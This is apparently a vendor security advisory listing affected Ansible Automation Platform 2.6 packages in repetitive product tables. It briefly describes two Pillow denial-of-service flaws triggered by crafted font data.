| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing specially crafted PCF font data. This data, when processed, can lead to excessive memory allocation because the library does not properly check for decompression bombs. The primary consequence is a Denial of Service (DoS), which could make the affected system or application unavailable.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library's font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
